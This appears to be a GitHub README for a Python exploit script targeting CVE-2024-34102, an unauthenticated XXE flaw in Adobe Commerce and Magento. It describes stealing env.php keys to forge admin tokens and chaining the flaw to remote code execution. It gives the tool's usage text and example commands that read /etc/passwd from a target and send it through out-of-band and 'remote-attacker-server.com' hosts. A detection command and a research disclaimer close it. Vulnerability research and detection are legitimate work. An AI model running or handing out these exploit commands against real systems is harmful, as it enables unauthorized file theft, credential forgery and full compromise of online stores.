/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)

Primary LanguagePythonMIT LicenseMIT

CosmicSting: critical unauthenticated XXE vulnerability in Adobe Commerce and Magento (CVE-2024-34102)

CVE-2024-34102 is a severe security flaw arising from improper handling of nested deserialization in Adobe Commerce and Magento. This vulnerability permits attackers to exploit XML External Entities (XXE) during the deserialization process, potentially allowing remote code execution. In short, attackers can craft malicious JSON payloads that, when deserialized by the application, instantiate objects with unintended properties or behaviors. This could lead to various security risks.

Exploiting this vulnerability allows attackers to gain unauthorized admin access to REST API, GraphQL API, or SOAP API, potentially leading to data theft, service disruption, and complete compromise of affected systems. This vulnerability poses a significant risk due to its ability to exfiltrate sensitive files, such as app/etc/env.php, containing cryptographic keys used for authentication. Attackers can exploit this to forge administrator tokens and manipulate Magento's APIs as privileged users.

Moreover, CVE-2024-34102 can be chained with other vulnerabilities, such as the PHP filter chains exploit (CVE-2024-2961), leading to remote code execution (RCE). The broader implications of XML External Entity (XXE) vulnerabilities enable attackers to retrieve and manipulate data from external sources, exacerbating the potential impact on compromised systems.

Usage

usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]

Exploit script for XXE vulnerability

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL (http(s)://ip[:port])
  --read-file READ_FILE, -r READ_FILE
                        File to read from the remote host
  --oob-server OOB_SERVER, -ob OOB_SERVER
                        OOB server URL (http(s)://ip[:port])
  --host-server HOST_SERVER, -hs HOST_SERVER
                        Host server URL (http(s)://ip[:port])

Examples

# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"

# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"

# Detection
python3 detect.py -t https://magento.test

Disclaimer

This exploit script has been created solely for the purposes of research and for the development of effective defensive techniques. It is not intended to be used for any malicious or unauthorized activities. The author and the owner of the script disclaim any responsibility or liability for any misuse or damage caused by this software. Users are urged to use this software responsibly and only in accordance with applicable laws and regulations. Use responsibly.